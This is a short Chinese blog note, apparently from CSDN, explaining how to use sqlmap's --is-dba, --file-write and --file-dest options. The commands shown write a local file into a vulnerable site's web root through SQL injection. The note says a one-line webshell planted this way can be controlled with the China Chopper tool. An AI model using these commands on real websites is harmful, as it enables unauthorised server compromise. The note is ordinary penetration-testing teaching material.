SQLMAP渗透笔记之file参数的使用

最新推荐文章于 2024-08-01 04:28:42 发布
最新推荐文章于 2024-08-01 04:28:42 发布
阅读量6.1k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/T780000063/article/details/78900474
版权




---------------------------------------------------------------------------------------------


                SQLMAP渗透笔记之file参数的使用




---------------------------------------------------------------------------------------------


权限:必须为dba权限


file-write 从本地写入


file-dest 写入目标路径


判断是否是dba权限(显示TRUE或者FALSE,TRUE即为dba权限,反之不是)


sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --is-dba


写入文件至站点目录


sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --file-write=本地文件路径 --file-dest 网站路径(写入路径)+"/写入的文件名"


sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --file-write=F:/a.aspx --file-dest D:/虚拟目录/Front/cx.aspx




D:/虚拟目录/Front   为网站的物理路径




写入成功后,即可通过浏览器访问,若为一句话木马则可使用中国菜刀进行连接。


注:网站路径必须为网站的真实物理路径(即绝对路径。也就是从盘符开始的路径),否则无法写入数据。
Birdman-one
关注
详解Java的File类(成员变量、构造方法及常用方法)
"✧treasure mountain✧"
03-05 9503
一、概述 java.io.File 类是文件和目录路径名的抽象表示 主要用于文件和目录的创建 查找和删除等操作 Java将电脑中的文件和文件夹目录封装为了一个File类 可以使用File类对文件和文件夹进行操作 可以使用File的方法来: 创建一个文件/文件夹 删除文件/文件夹 获取文件/文件夹 判断文件/文件夹是否存在 对文件夹进行遍历 获取文件的大小 File类是一个与系统无关的类 任何操...
java file 参数_JavaFile
weixin_42501848的博客
02-24 2222
1 绝对路径和相对路径绝对路径:是一个完整的路径以盘符(C: D:)开始的路径C:\\a.txt相对路径:是一个简化的路径相对是指的是当前的项目根目录(c:)如果使用当前项目的根目录,路径可以简化写成 a.txt路径是不区分大小写的路径中的文件名称分隔符window系统是反斜杠,反斜杠是转义字符,需要使用双反斜杠代表反斜杠2 File类的三种构造方法File(String pathname)通过将...
directfbrc文件的使用参数的详细说明
心中天堂的专栏
06-12 1671
摘要:本文主要介绍了directfbrc文件的使用参数的详细说明,在directfb应用程序启动做初始化阶段,都会去试图读取该文件。---------------------------------------------------------------------------------------------------------------------声明: 
【网络安全】SQLMap详细使用教程
程序员若风的博客
07-30 927
SQL注入是一种广泛存在于Web应用程序的漏洞,可以导致敏感数据泄露、系统破坏等严重后果。SQLMap是一款自动化SQL注入工具,它可以帮助渗透测试人员快速发现和利用SQL注入漏洞。本文将介绍SQLMap的详细使用教程和常用命令。
python:open/文件操作
weixin_34190136的博客
02-24 302
open/文件操作f=open('/tmp/hello','w')#open(路径+文件名,读写模式)#读写模式:r只读,r+读写,w新建(会覆盖原有文件),a追加,b二进制文件.常用模式如:'rb','wb','r+b'等等 读写模式的类型有: rU 或 Ua 以读方式打开, 同时提供通用换行符支持 (PEP 278)w     以写方式打开,a     以追加模式打开 (从 EOF 开始,...
参数和文件
kobexzf的博客
12-24 176
用户变量 set @t1=3; select @t1; 系统参数(变量):分别6个设置和获取方式,但有些不可设置 set global|session(没有的话为session)name=value set (@@global.|@@session.|@@(这个为session))name=value select (@@global.|@@session.|@@(这个为session))name...
SQLMAP使用笔记.pdf
01-25
下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、...
sqlmap使用笔记1
08-03
本篇笔记将深入探讨sqlmap使用方法和功能,涵盖多个核心知识点。 1. **数据库版本探测**: 使用`-b`选项可以获取数据库版本信息,这对于识别潜在的漏洞和制定攻击策略至关重要。例如,针对不同的数据库版本,...
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
2301_82242964的博客
05-04 652
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
Sqlmap使用教程【笔记精华整理】
qq122219685的专栏
05-20 372
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 教程说明 学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap使用。 我的另一个笔记整理:可能是网上最易懂的SQL手工注入教程【个人笔记精华整理】 针对sqlmap注入过waf,可以参考:sqlmap注入之t
SQLMAP
xiaomengxin70的博客
05-28 1763
SQLmap简介: sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB sqlmap五种不同的注入模式:
linux file常用参数,Linux文件管理常用命令常用参数详解
weixin_33918358的博客
05-12 221
目录管理1、LS [参数] [目标目录]LS 列出目录下子目录和文件-a 列出所有目录和文件包括隐藏目录-l 列出文件详细信息:自左到右文件类型,权限,属主,属组,大小,时间,文件名-h 列出可以读懂的格式文件大小-S 根据文件大小排序-s 列出文件块大小-t 根据时间排序排序-r 以相反顺序排序2、mkdir 创建空目录 rmdir 删除空目录可以一次创建多个目录-v 显示创建目录详细信息-p ...
File
阿劼
08-26 243
File类:用来将文件或文件夹封装成对象,方便对文件与文件夹的属性进行操作,File对象可以作为参数传递给流的构造函数。 ·获取方法: ·getName():获取文件名 ·getAbsolutePath():获取文件的绝对路径 ·getPath():获取文件的相对路径 ·length():返回此抽象路径名表示的文件的长度,如果此路径名表示目录,则返回值未...
python 传入 file 参数
onlyyou624的博客
05-21 932
files = [ ('faceImage', open(pic_name, 'rb')) ] if "queryDate" in df: queryDate = df.loc[i, "queryDate"] format_date = format_date_check(queryDate) payload = { "queryDate": format_date } else: payload = {} try: r = requ.
本地HTML文件 带参数方案
weixin_30521649的博客
06-06 335
笔者在APL(抽象编程语言)平台中, 已经完成把 APL平台的APIs桥接到 javascript中. 因此目前写 本地的HTML页面有两种方式: 1. 通过本地的Web服务器方式: aplx文件方式, 这种写法类似php之类, 笔者在此不再叙述. 2. 以 file协议 打开HTML文件: 这种方式在 WebBrowser控件中是不能支持到 url地址带参数....
httppost请求传递参数file的集合
adaadadsa的博客
05-27 4497
package com.zjxt.demo.test; import org.apache.http.HttpEntity; import org.apache.http.HttpResponse; import org.apache.http.client.HttpClient; import org.apache.http.client.methods.HttpPost; import o...
file类型参数怎么传java
最新发布
weixin_41534504的博客
08-01 48
给大家整理了一些有关【F,Java】的项目学习资料(附讲解~~):https://edu.51cto.com/course/27963.htmlhttps://edu.51cto.com/course/35714.htmlFile类型参数在Java中的传递方式 在Java中,处理文件通常需要使用File类,它代表一个文...
sqlmap(五)
ys1215的博客
04-06 1418
文件读写,获取shell
Http Post请求 接口 传输 File 组合参数 | 接口支持传输语音流
没有伞的孩子必须努力奔跑!—小林
05-23 5596
类似于以下方式的请求可参考,以下代码: package com.ctd.cloud.goclouds.usercenter.awscase.controller; import org.apache.http.Consts; import org.apache.http.HttpEntity; import org.apache.http.HttpResponse; import org...
SQLMap渗透测试指南:使用与tamper脚本解析
"该资源为一个关于sqlmap的PPT介绍,主要讲解了如何使用sqlmap这个渗透测试工具,特别是它的-tamper选项以及在Burp Suite中的应用。" SQLMap是一个广泛使用的开源渗透测试工具,专门针对SQL注入漏洞进行自动化检测...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值